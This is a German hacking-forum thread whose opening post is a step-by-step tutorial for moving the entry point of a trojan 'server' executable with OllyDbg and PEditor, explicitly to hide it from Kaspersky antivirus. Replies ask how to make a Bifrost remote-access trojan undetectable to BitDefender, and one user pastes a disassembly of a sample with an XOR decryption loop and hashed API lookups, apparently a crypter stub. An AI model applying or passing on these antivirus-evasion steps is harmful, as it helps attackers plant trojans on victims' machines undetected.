[B] EntryPoint verschieben

[GODFATHER]

Wie verschiebe ich den EntryPoint?

Info: Den EntryPoint müsst ihr verschieben, wenn ihr euren Trojaner z.B. vor KAV o.ä. verstecken wollt. Wie immer dürft ihr das nur lokal zu Testzwecken machen, und solltet ihr diese Dateien an andere verschicken, müsst ihr sie immer darüber unterrichten, was das für eine Datei ist.


Was ihr braucht:
• OllyDbg 1.10
• PEditor 1.7
• EXE-Datei
• Editor

So wird's gemacht:
1. Ihr öffnet eure EXE-Datei in OllyDbg. Bei Fragen einfach "Ja" klicken!

http://img213.imageshack.us/my.php?image=pic1do3.gif

2. Ihr kopiert alles von "PUSH EBP" bis "CALL DWORD..." (markieren, Rechtsklick, Copy > To Clipboard). Dann öffnet ihr den Editor (Start > Ausführen > "notepad") und fügt dort alles durch Rechtsklick > Einfügen ein.

http://img240.imageshack.us/my.php?image=pic2sp0.jpg

3. Dann schreibt ihr editiert ihr alles wie auf dem Bild zu sehen!
http://img122.imageshack.us/my.php?image=pic3nr7.jpg

4. Dann sucht ihr euch eine freie Stelle (wo z.B. nur "DB 00" steht). z.B.: 00407673.
Dort schreibt ihr dann alles rein, was ihr in den Editor kopiert habt, außer die letzte Zeile. Dann sollte das ganze so aussehen:

http://img216.imageshack.us/my.php?image=pic4ao8.jpg

5. Hinter das "PUSH ESI" schreibt ihr dann noch ein "PUSH 1". Dann schreibt ihr noch ein "JMP 004074A8" hinter "PUSH 1". Das "004074A8" kommt auch wieder aus unserem Editor. Es ist die Stelle an dem "CALL DWORD..." steht. Dann hätten wir in OllyDbg auch schon alles fertig smile . Das ganze sieht dann so aus:

http://img223.imageshack.us/my.php?image=pic45xp7.jpg

6. Dann markiert ihr alles neue (Rechtsklick > Copy > To Clipboard) und kopiert es wieder in euren Editor! Daraufhin klickt ihr Rechtsklick > Copy to executable > All modifications. Dann klickt ihr auf "Copy all" und dann wieder Rechtsklick > Save File. Und speichert das ganze als "server_new.exe".
7. Dann startet ihr PEditor 1.7 und öffnet die "server_new.exe". Nun schauen wir uns an wo unser neuer Server anfängt. Im Editor ist das im 2. Block (der gerade eben kopierte) der erste Zahlensatz. Bei mir: "00407674".
8. Dann seht ihr das im PEditor was von "Image Base" steht. In meinem Fall "00400000" So, jetzt schauen wir uns die beiden Zahlen mal an:
"00407674" -
"00400000"
= "7674" (Unser neuer Entrypoint)
9. Den neuen EntryPoint geben wir bei "Entry Point" ein und klicken auf "apply changes".
10. Fertig! smile Jetzt hat euer Server einen neuen Entrypoint und wenn er nicht mehr klappen sollte, dann habt ihr was falsch gemacht Augenzwinkern

PS: Wenn ihr den Server vor KAV stealthen wollt, dann müsst ihr den EP 3x verschieben und dann könnt ihr erst nach den Hex-Offsets suchen!


Links zu den Programmen:
• OllyDbg 1.10
• http://www.ollydbg.de/odbg110.zip
• PEditor 1.7
• http://www.softpedia.com/get/Program.../PEditor.shtml

[Teto]

Ich würde es ja gerne ausprobieren,aber die Bilder dazu sind so nichts sagend weil ich da nicht erkenne wo du was verändert hast.

[GODFATHER]

Den Text solltest du schon lesen....

[Teto]

Noch ne andere Frage kann ich den server auch gegen BitDefender ud machen mit diesem verfahren?Ich habe mein Bifrost nämlich mal FUD gehbt und jetzt erkennt BitDefender den immer und auf mein thread antwortet mir ja keiner wie das ncoh dagegen UD mache.Es sind zwar dann noch 2 andere av´s die ihn erkennen,aber die sind unwichtig.

[GODFATHER]

Probieren geht über studieren!

[OMFG]

Bei mir hat der PEditor link nicht geklappt. Wäre nett wenn du den alten link mit dem http://www.softpedia.com/get/Programming/File-Editors/PEditor.shtml]hier [/url]ersetzt.

[Roflcopter]

sehr nettes tut danke. endlich bin ich auch in der lage den entrypoint zu verschieben.

[abcdef]

3. Dann schreibt ihr editiert ihr alles wie auf dem Bild zu sehen!
http://img122.imageshack.us/my.php?image=pic3nr7.jpg

was soll ich wo editieren???? das versteh ich nicht so richtig!!

mfg
abcdef

[sorgerman]

das nächste call DWORD ist bei mir sehr viel weiter unten... was machen?


00402F21 /$ 55 PUSH EBP
00402F22 |. 8BEC MOV EBP,ESP
00402F24 |. 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]
00402F27 |. 0F31 RDTSC
00402F29 |. 92 XCHG EAX,EDX
00402F2A |. 33C9 XOR ECX,ECX
00402F2C |> 69C0 054B56AC /IMUL EAX,EAX,AC564B05
00402F32 |. 83C0 01 |ADD EAX,1
00402F35 |. 89848E D908000>|MOV DWORD PTR DS:[ESI+ECX*4+8D9],EAX
00402F3C |. 83C1 01 |ADD ECX,1
00402F3F |. 83F9 22 |CMP ECX,22
00402F42 |.^72 E8 \JB SHORT dorc.00402F2C
00402F44 |. D9E8 FLD1
00402F46 |. DBBE 61090000 FSTP TBYTE PTR DS:[ESI+961]
00402F4C |. C786 D1080000 >MOV DWORD PTR DS:[ESI+8D1],0
00402F56 |. C786 D5080000 >MOV DWORD PTR DS:[ESI+8D5],50
00402F60 |. E8 15000000 CALL dorc.00402F7A
00402F65 |. 57 PUSH EDI
00402F66 |. BF 1E000000 MOV EDI,1E
00402F6B |> E8 0A000000 CALL dorc.00402F7A
00402F70 |. 83EF 01 SUB EDI,1
00402F73 |.^75 F6 JNZ SHORT dorc.00402F6B
00402F75 |. 5F POP EDI
00402F76 |. C9 LEAVE
00402F77 \. C2 0400 RETN 4
00402F7A /$ 53 PUSH EBX
00402F7B |. 8B9E D1080000 MOV EBX,DWORD PTR DS:[ESI+8D1]
00402F81 |. 8B8E D5080000 MOV ECX,DWORD PTR DS:[ESI+8D5]
00402F87 |. 8B9433 D908000>MOV EDX,DWORD PTR DS:[EBX+ESI+8D9]
00402F8E |. 8B8433 DD08000>MOV EAX,DWORD PTR DS:[EBX+ESI+8DD]
00402F95 |. C1C2 13 ROL EDX,13
00402F98 |. C1C0 1B ROL EAX,1B
00402F9B |. 039431 D908000>ADD EDX,DWORD PTR DS:[ECX+ESI+8D9]
00402FA2 |. 038431 DD08000>ADD EAX,DWORD PTR DS:[ECX+ESI+8DD]
00402FA9 |. 898433 D908000>MOV DWORD PTR DS:[EBX+ESI+8D9],EAX
00402FB0 |. 899433 DD08000>MOV DWORD PTR DS:[EBX+ESI+8DD],EDX
00402FB7 |. 83EB 08 SUB EBX,8
00402FBA |. 73 05 JNB SHORT dorc.00402FC1
00402FBC |. BB 80000000 MOV EBX,80
00402FC1 |> 83E9 08 SUB ECX,8
00402FC4 |. 73 05 JNB SHORT dorc.00402FCB
00402FC6 |. B9 80000000 MOV ECX,80
00402FCB |> 899E D1080000 MOV DWORD PTR DS:[ESI+8D1],EBX
00402FD1 |. 898E D5080000 MOV DWORD PTR DS:[ESI+8D5],ECX
00402FD7 |. 5B POP EBX
00402FD8 \. C3 RETN
00402FD9 >/$ 68 10504000 PUSH dorc.00405010
00402FDE |. E8 3EFFFFFF CALL dorc.00402F21
00402FE3 |. 64:A1 30000000 MOV EAX,DWORD PTR FS:[30]
00402FE9 |. 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
00402FEC |. 8B70 1C MOV ESI,DWORD PTR DS:[EAX+1C]
00402FEF |. AD LODS DWORD PTR DS:[ESI]
00402FF0 |. FF70 08 PUSH DWORD PTR DS:[EAX+8]
00402FF3 |. 8F05 CB5A4000 POP DWORD PTR DS:[405ACB]
00402FF9 |. B9 1C1F0000 MOV ECX,1F1C
00402FFE |. 8D15 04104000 LEA EDX,DWORD PTR DS:[401004]
00403004 |> 803411 5A /XOR BYTE PTR DS:[ECX+EDX],5A
00403008 |. 83E9 01 |SUB ECX,1
0040300B |.^73 F7 \JNB SHORT dorc.00403004
0040300D |. 8D3D 8C254000 LEA EDI,DWORD PTR DS:[40258C]
00403013 |. 68 050B7E26 PUSH 267E0B05
00403018 |. FF35 CB5A4000 PUSH DWORD PTR DS:[405ACB]
0040301E |. 68 46254000 PUSH dorc.00402546
00403023 |. FFD7 CALL EDI
00403025 |. A3 3D504000 MOV DWORD PTR DS:[40503D],EAX
0040302A |. 68 8CAD5DDB PUSH DB5DAD8C
0040302F |. FF35 CB5A4000 PUSH DWORD PTR DS:[405ACB]
00403035 |. 68 46254000 PUSH dorc.00402546
0040303A |. FFD7 CALL EDI
0040303C |. 8BF0 MOV ESI,EAX
0040303E |. 68 92F3DC04 PUSH 4DCF392
00403043 |. FF35 CB5A4000 PUSH DWORD PTR DS:[405ACB]
00403049 |. 68 46254000 PUSH dorc.00402546
0040304E |. FFD7 CALL EDI
00403050 |. 68 FF000000 PUSH 0FF
00403055 |. 8D1D C2554000 LEA EBX,DWORD PTR DS:[4055C2]
0040305B |. 53 PUSH EBX
0040305C |. 6A 00 PUSH 0
0040305E |. FFD0 CALL EAX
00403060 |. 50 PUSH EAX
00403061 |. 68 03BF2139 PUSH 3921BF03
00403066 |. FF35 CB5A4000 PUSH DWORD PTR DS:[405ACB]
0040306C |. 68 46254000 PUSH dorc.00402546
00403071 |. FFD7 CALL EDI
00403073 |. FFD0 CALL EAX
00403075 |. 50 PUSH EAX
00403076 |. FFD6 CALL ESI
00403078 |. 83E8 03 SUB EAX,3
0040307B |. 59 POP ECX
0040307C |. 3BC8 CMP ECX,EAX
0040307E |. 75 29 JNZ SHORT dorc.004030A9
00403080 |. 8D05 A75B4000 LEA EAX,DWORD PTR DS:[405BA7]
00403086 |. 50 PUSH EAX
00403087 |. 8D05 635B4000 LEA EAX,DWORD PTR DS:[405B63]
0040308D |. 50 PUSH EAX
0040308E |. 6A 00 PUSH 0
00403090 |. 6A 00 PUSH 0
00403092 |. 6A 00 PUSH 0
00403094 |. 6A 00 PUSH 0
00403096 |. 6A 00 PUSH 0
00403098 |. 6A 00 PUSH 0
0040309A |. 8D05 E6124000 LEA EAX,DWORD PTR DS:[4012E6]
004030A0 |. 50 PUSH EAX
004030A1 |. 53 PUSH EBX
004030A2 |. FF15 3D504000 CALL DWORD PTR DS:[40503D]

[zulu1336]

gibt es fuer sowas netshon ein tool names eptrciker?